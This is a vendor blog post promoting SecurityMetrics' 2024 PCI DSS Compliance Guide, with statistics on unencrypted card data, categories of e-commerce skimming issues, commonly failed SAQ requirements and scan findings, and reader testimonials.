Top Cybersecurity Data Insights: a Breakdown of Our 2024 PCI DSS Guide

Introduction

Unless you live and breathe PCI compliance, it can easily overwhelm, confuse, or downright frustrate you as you attempt to navigate it. Even for those of us who do, there is a lot to keep track of, especially as requirements change and your business grows.

That’s where SecurityMetrics comes in. 

Since PCI Compliance is a necessity (and frankly, a wise decision), we’re committed to helping you navigate it by simplifying the process, empowering your organization, and protecting your customers. That’s why we’ve created the PCI DSS Compliance Guide. Our guide takes you through all 12 PCI requirements, SAQ types, and provides step-by-step instructions on how to succeed with PCI.

About the PCI Guide

For 2024, our guide remains one of the best resources to use as you achieve PCI compliance for your organization. It covers each requirement with clarity and thoroughness. 

Audit Director, Matt Halbleib (CISSP, CISA, QSA), said "We publish our guide to give businesses of all sizes a tool to understand and organize their PCI compliance efforts. Maintaining PCI compliance in an environment-specific way helps businesses protect their data, detect breaches, and keep cybercriminals off their network." 

As a downloadable PDF, you can easily access and navigate it to stay on top of your PCI progress, step by step. 

Topics included in the SecurityMetrics PCI Guide are:  

• PCI DSS Version 4
• New Changes To PCI Compliance
• PCI Compliance Trends
• Understanding Your PCI DSS Responsibility
• 12 Requirements of PCI Compliance
• How To Prepare For A Data Breach
• How To Create An Incident Response Plan
• Data Breach Prevention Tools
• PCI Compliance Best Practices

"Businesses who utilize the Guide to PCI DSS Compliance can better organize their compliance efforts and understand the way PCI compliance requirements affect cybersecurity. On top of that, the PCI Guide is a great training tool when assigning new resources to your PCI compliance effort,” said SecurityMetrics VP of Assessments Gary Glover (CISSP, CISA, QSA).

What’s New in the 2024 PCI DSS Guide?

On a regular basis, the PCI Requirements and language around them get updated and improved, meaning we do the same to our guide to ensure it stays relevant and useful. With the release of PCI v4.0 and 4.0.1, there are a handful of elements that we’ve changed to reflect the updates.

A major update that we’ve included in our 2024 guide is more information and tips about implementing v4, especially in the Auditor’s Perspective sections.

There is also a new section we’ve created that includes a detailed list of new PCI DSS v4 requirements, which v4 requirements apply to which SAQ type, and when those requirements need to be implemented by.

In addition, there are several pieces of data we’ve uncovered to help your business succeed and avoid common pitfalls as organizations work to get compliant.

2024 PANscan® Data Analysis

Storage of unencrypted payment card data increases an organization’s risk and liability in the event of a data breach.

Since 2010, SecurityMetrics PANscan® has discovered over 3 billion unencrypted PANs on business networks. In 2023, users scanned over 2,800 computers and 309.65 TBs. Here are some key statistics:

• 83.6% of PANscan® users discovered unencrypted PAN data
• 6% stored track data (i.e., data inside magnetic stripe)
• Over 114,468,632 PANs were found

Findings From SecurityMetrics' Ecommerce Security Service 

SecurityMetrics Shopping Cart Inspect helps businesses detect if their shopping cart has been breached. 

With the help of Shopping Cart Inspect, SecurityMetrics Forensic Analysts review businesses’ rendered webpage code on their shopping cart URL to collect evidence of a skimming attack.

• 92.4% of Shopping Cart Inspect reviews identified malicious, suspicious, and/or concerning issues on researched ecommerce sites.
  • % of Ecommerce Sites Had the Following Issues
    • 7.4% of inspected ecommerce sites had malicious issues.
    • 80.2% of inspected ecommerce sites had suspicious issues.
    • 53.5% of inspected ecommerce sites had concerning issues.
• 2.44 issues: Average number of issues identified in a Shopping Cart Inspect review.
  • % of Issues Discovered
    • 3.70% of issues discovered were malicious
    • 68.26% of issues were suspicious 
    • 28.04% of issues were concerning
• Malicious: Evidence of card data being stolen. (Highest threat level)
• Suspicious: Identified issues increase the probability of a potential exploit. (Medium threat level)
• Concerning: Unlikely method of being breached, but identified issues could lead to a potential exploit. (Low threat level)

Top 5 Malicious Issues Found

1. Malicious Double Checkout
   Double post of credit card data returning to alternate checkout page on merchant's server.
2. Malicious Post
   A script is running with a post of data to a known bad site.
3. Malicious Javascript
   Javascript appears to be acting in a malicious manner, such as harvesting credit cards or other sensitive data.
4. Form Jacking
   Authorized payment webform is being replaced by a counterfeit.
5. Directory Browsing Enabled
   Directory Browsing is enabled on the web pages analyzed. 

Top 5 Suspicious Issues Found

1. Javascript issue
   Out-of-date JavaScripts can lead to vulnerabilities available for future malicious attacks.
2. Ads/Business Intelligence
   Advertising/Analytics content is being pulled into the pages being reviewed in the checkout environment. This can be a source of intermittent card/data loss due to drive-by malvertising.
3. Out-of-date CMS - Suspicious
   Out-of-date web components. Unpatched or un-updated software is a leading cause of sites losing sensitive data.
4. Configuration Issue
   Missing required web server security headers.
5. Suspicious double checkout
   Double post of credit card data returning merchant's checkout page on the server. This practice could impact the security of the site and should be reviewed for business needs.

Top 5 Concerning Issues Found

1. Configuration Vulnerability
   A configuration item with a website or web server is not following best security practices.
2. Checkout Configuration Issue
   The implementation of certain aspects of the checkout process may not follow best security practices and could leave merchants vulnerable to certain types of attacks.
3. Mixed HTTP/HTTPS
   content called via HTTP in an HTTPS environment, breaking strict SSL/TLS protocol. In severe cases, this can be exploited by bad actors to view privileged content.
4. HTTP Header Issue
   Improperly configured HTTP headers can provide attackers with specific information about your web server setup, such as vulnerable software versions.
5. SPAM Watch
   A domain has been flagged by the SPAM community, which could be using the email server to transmit malicious communications by bad actors.
   

PCI Compliance Data

2023 SecurityMetrics Customer Trends

• 90.4% of SecurityMetrics customers that started their SAQ have achieved a passing status
• 22 days: Average time to reach PCI DSS compliance
• 1.02 times: Average number of support incidents before customers became compliant
• 79.21% percent of SecurityMetrics customers that passed their first scan
• 6 days: Average time from finished first scan to first passing scan
• 1.3 scans: Average number of times scanned until merchants pass their PCI scan

Top 10 Failing Self-Assessment Questionnaire (SAQ) Sections

We scanned our merchant database in search of the top 10 areas where SecurityMetrics merchant customers struggle to become compliant. Starting with the least adopted requirement, these are the results:

1. Requirement 12.1: Establish, publish, maintain, and disseminate a security policy.
2. Requirement 12.10.1: Create an incident response plan to be implemented in the event of a system breach.
3. Requirement 12.2: Verify that an annual risk-assessment process is documented that: identifies critical assets, threats, and vulnerabilities, and results in a formal, documented analysis of risk 
4. Service Providers
   Requirement 12.8.4: Maintain a program to monitor service providers’ PCI DSS compliance status at least annually.
5. Requirement 12.5.3: Establish, document, and distribute security incident response and escalation procedures to ensure timely and effective handling of all situations.
6. Requirement 12.5.4: Administer user accounts, including additions, deletions, and modifications.
7. Requirement 12.5.5: Monitor and control all access to data.
8. Awareness Program
   Requirement 12.6.a: Implement a formal security awareness program to make all personnel aware of the cardholder data security policy and procedures.
9. Requirement Management
   Requirement 12.8.5: Maintain information about which PCI DSS requirements are managed by each service provider, and which are managed by the entity.
10. Requirement 12.1.1: Review the security policy at least annually and update the policy when the environment changes.

Top 5 Failed Vulnerabilities from Vulnerability Scans

• SSL Self-Signed Certificate: Occurs when organizations use an identity certificate that they create, sign, and certify rather than a trusted certificate authority (CA)
• TLS version 1.1 protocol detection: Exists if the remote service accepts connections using TLS 1.0 encryption
• TLS version 1.0 protocol detection: Exists if the remote service accepts connections using TLS 1.0 encryption
• SSL 64-bit Block Size Cipher Suites Supported (Sweet32): Exists if a remote host supports the use of a block cipher with 64-bit blocks in one or more cipher suites
• SSL certificate with the wrong hostname: Happens when an SSL certificate for the tested service is for a different host

What Readers Are Saying About the PCI Guide

“I needed quick and straightforward guidance on how the PCI DSS requirements apply to software development. I was able to quickly find what I needed, written in a way that was both quickly digestible and highly understandable. This resolved the concerns we had and reinforced the importance of the standardization of process controls we are putting in place.”

“This is a fantastic guide for merchants on any level to work towards becoming PCI compliant; it also serves as a great resource to train future hires!”

“Excellent guide to PCI compliance which provides a manageable template to develop internal policies and procedures.”

“The SecurityMetrics Guide was very comprehensive and definitely extremely useful. I especially benefited from the IT checklist guide.”

 “SecurityMetrics Guide to PCI DSS Compliance is a one-stop guide to ensuring your organization is PCI DSS compliant. This is the best comprehensive guide I've found.”

“Made us aware of a lot of details concerning our security . . . also our service provider responsibilities, which we were not aware of. Provided us with valuable tips for firewalls and explained a lot of terminology that was unknown before PCI DSS.”

Conclusion

The PCI DSS is a security standard that can provide an organized and comprehensive framework for any environment. It includes specific SAQs, based on variables like the way companies take payment information. These SAQs cover which specific places businesses need to look to start their data security programs and can save companies time and money.

2024’s guide remains a staple and vital tool for any business that wants to simplify their PCI compliance process and is looking for help in successfully navigating it. It’s also important to remember that with both v4.0 and v4.0.1 live, you’ll need to implement and update any aspect of your company’s security that doesn’t fall in line with both of them.